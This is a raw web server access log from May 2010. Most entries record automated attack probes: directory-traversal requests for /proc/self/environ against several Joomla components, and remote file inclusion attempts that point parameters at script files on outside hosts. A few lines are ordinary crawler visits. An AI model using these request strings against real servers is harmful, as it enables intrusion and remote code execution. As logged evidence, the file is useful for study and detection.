80.65.166.74 - - [28/May/2010:01:49:26 -0500] "GET /logs/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [28/May/2010:01:49:26 -0500] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.135.18 - - [28/May/2010:01:50:36 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:36 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:36 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:01:50:36 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:01:50:36 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:01:50:36 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:01:50:36 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:36 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:37 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:01:50:37 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:01:50:37 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:01:50:37 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:01:50:37 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:37 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:37 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:37 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:38 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:39 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:39 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:39 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:01:50:39 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:01:52:26 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
75.125.131.10 - - [28/May/2010:01:55:48 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.131.10 - - [28/May/2010:01:55:49 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
208.100.59.16 - - [28/May/2010:01:55:53 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.100.59.16 - - [28/May/2010:01:55:53 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
89.17.201.144 - - [28/May/2010:01:55:54 -0500] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
89.17.201.144 - - [28/May/2010:01:55:54 -0500] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
174.133.201.194 - - [28/May/2010:01:55:58 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:01:55:58 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [28/May/2010:01:56:54 -0500] "GET /logs/access_log.1173398400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.51.42.60 - - [28/May/2010:01:58:13 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:01:58:13 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:01:58:13 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:01:58:14 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
67.210.98.160 - - [28/May/2010:01:59:12 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:01:59:16 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
204.152.200.50 - - [28/May/2010:01:59:50 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:02:00:15 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
67.210.98.160 - - [28/May/2010:02:00:23 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:00:23 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:00:23 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.210.98.160 - - [28/May/2010:02:00:23 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
114.108.151.149 - - [28/May/2010:02:04:25 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:04:26 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:04:42 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:04:42 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.88.4.141 - - [28/May/2010:02:04:51 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.108.151.149 - - [28/May/2010:02:05:01 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:05:02 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:05:27 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:05:27 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:02:05:44 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:02:05:44 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:02:05:44 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:02:05:44 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
114.108.151.149 - - [28/May/2010:02:05:59 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:05:59 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:06:10 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:06:11 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.200 - - [28/May/2010:02:06:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.118.123 - - [28/May/2010:02:06:46 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:06:47 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
75.125.131.10 - - [28/May/2010:02:06:50 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.131.10 - - [28/May/2010:02:06:50 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.131.10 - - [28/May/2010:02:06:50 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
114.108.151.149 - - [28/May/2010:02:06:50 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:06:54 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
75.125.131.10 - - [28/May/2010:02:06:54 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.131.10 - - [28/May/2010:02:06:54 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.131.10 - - [28/May/2010:02:06:54 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
208.100.59.16 - - [28/May/2010:02:06:58 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
208.100.59.16 - - [28/May/2010:02:06:58 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.100.59.16 - - [28/May/2010:02:06:59 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.59.16 - - [28/May/2010:02:07:10 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
208.100.59.16 - - [28/May/2010:02:07:10 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.100.59.16 - - [28/May/2010:02:07:10 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
121.88.4.141 - - [28/May/2010:02:07:15 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
65.60.53.122 - - [28/May/2010:02:07:41 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.60.53.122 - - [28/May/2010:02:07:41 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.60.53.122 - - [28/May/2010:02:07:41 -0500] "GET /logs/access_log.1273622400//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:02:07:45 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:07:45 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:02:07:50 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.60.53.122 - - [28/May/2010:02:07:50 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.60.53.122 - - [28/May/2010:02:07:50 -0500] "GET /logs/access_log.1273622400//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:02:08:39 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:08:39 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:08:57 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:08:57 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [28/May/2010:02:09:10 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [28/May/2010:02:09:10 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [28/May/2010:02:09:10 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [28/May/2010:02:09:10 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.194.111 - - [28/May/2010:02:09:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.111 - - [28/May/2010:02:09:30 -0500] "GET /artwork/faux-malachite-menorrah.png HTTP/1.1" 200 53045 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [28/May/2010:02:09:32 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:02:09:33 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.129.119.43 - - [28/May/2010:02:09:43 -0500] "GET /logs/access_log.1274054400 HTTP/1.1" 200 663666 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
